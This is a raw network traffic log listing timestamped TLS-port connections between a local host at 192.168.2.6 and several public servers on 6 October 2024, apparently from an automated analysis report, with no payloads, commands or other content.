                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.646162033 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.646173954 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.646205902 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.646251917 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.718657970 CEST49719443192.168.2.6172.67.196.219
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.718686104 CEST44349719172.67.196.219192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.836363077 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:50.836616039 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.016007900 CEST44349725172.217.18.100192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.021913052 CEST44349705173.222.162.64192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.022036076 CEST49705443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.056797028 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.310834885 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.310853004 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.311253071 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.325190067 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.325211048 CEST44349725172.217.18.100192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.326834917 CEST44349725172.217.18.100192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.326900959 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.334970951 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.379398108 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432260036 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432293892 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432321072 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432364941 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432389021 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432434082 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.432434082 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.473617077 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.473653078 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.473783970 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.475558996 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.475579977 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.517803907 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.517836094 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.517923117 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.517923117 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.517937899 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.518006086 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519129992 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519157887 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519232035 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519232035 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519239902 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.519335032 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604190111 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604216099 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604252100 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604283094 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604311943 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604430914 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604871035 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604891062 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604950905 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604958057 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604990959 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.604991913 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605783939 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605804920 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605839968 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605846882 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605889082 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.605889082 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.606821060 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.606841087 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.606905937 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.606905937 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.606914043 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.607000113 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690759897 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690793037 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690834999 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690853119 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690865993 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.690913916 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691306114 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691329956 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691358089 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691366911 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691401958 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.691401958 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692070007 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692095041 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692133904 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692143917 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692172050 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692187071 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692663908 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692684889 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692718983 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692728996 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692749977 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.692766905 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693814993 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693840981 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693897009 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693908930 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693993092 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.693993092 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694184065 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694209099 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694236040 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694242001 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694262028 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694278955 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694282055 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694305897 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694377899 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694524050 CEST49724443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.694539070 CEST4434972413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.766524076 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.766561985 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.766663074 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.768537998 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.768560886 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.768630028 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.769263983 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.769309044 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.769371033 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771049976 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771060944 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771121979 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771676064 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771688938 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771872044 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771888018 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771948099 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.771966934 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.772892952 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.772902012 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.772950888 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.773026943 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.773039103 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.773149014 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.773166895 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.794954062 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.795177937 CEST44349725172.217.18.100192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.843679905 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.843719959 CEST44349725172.217.18.100192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:51.887186050 CEST49725443192.168.2.6172.217.18.100
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.118103027 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.118200064 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.406153917 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.408998013 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.410626888 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.418281078 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.420655966 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.459321976 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.459341049 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.459341049 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.459363937 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:52.474733114 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.059849024 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.059885979 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.060359001 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.068150043 CEST49732443192.168.2.6151.101.194.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.068242073 CEST44349732151.101.194.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.068327904 CEST49732443192.168.2.6151.101.194.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.068552971 CEST49732443192.168.2.6151.101.194.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.068572044 CEST44349732151.101.194.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.070281982 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.070308924 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.070868015 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.070873976 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.071392059 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.071419954 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.071774960 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.071790934 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072215080 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072230101 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072721004 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072725058 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072887897 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.072897911 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.073659897 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.073663950 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.073798895 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.073817968 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.074461937 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.074476957 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.110560894 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.165919065 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.165970087 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.166030884 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.166057110 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.166100979 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.166143894 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.166188002 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167196035 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167570114 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167594910 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167748928 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167804956 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.167856932 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169015884 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169044971 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169076920 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169102907 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169126987 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169147015 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169158936 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169166088 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169225931 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169266939 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169404030 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.169675112 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.275701046 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.275732994 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.275748968 CEST49727443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.275757074 CEST4434972713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.276449919 CEST49731443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.276464939 CEST4434973113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.277467012 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.277467966 CEST49730443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.277513027 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.277529001 CEST4434973013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.278455973 CEST49729443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.278469086 CEST4434972913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.279186964 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.279186964 CEST49728443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.279195070 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.279202938 CEST4434972813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.305054903 CEST49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.305105925 CEST4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.305172920 CEST49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.314403057 CEST49733443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.314418077 CEST4434973313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.331754923 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.348788023 CEST49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.348808050 CEST4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.349353075 CEST49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.372066021 CEST49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.372111082 CEST4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.372175932 CEST49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.373774052 CEST49736443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.373812914 CEST4434973613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.373863935 CEST49736443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.374816895 CEST49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.374891996 CEST4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.374955893 CEST49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.375411034 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401580095 CEST49737443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401624918 CEST4434973713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401659012 CEST49736443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401685953 CEST4434973613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401930094 CEST49734443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.401958942 CEST4434973413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.422537088 CEST49735443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.422581911 CEST4434973513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.516772985 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.516849041 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.516902924 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.517004013 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.517024994 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.517040968 CEST49726443192.168.2.6184.28.90.27
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.517047882 CEST44349726184.28.90.27192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.520436049 CEST44349732151.101.194.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.520915985 CEST49732443192.168.2.6151.101.194.137
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.520932913 CEST44349732151.101.194.137192.168.2.6
                                                                                                                                                                                                                                                                                Oct 6, 2024 16:41:53.522347927 CEST44349732151.101.194.137192.168.2.6
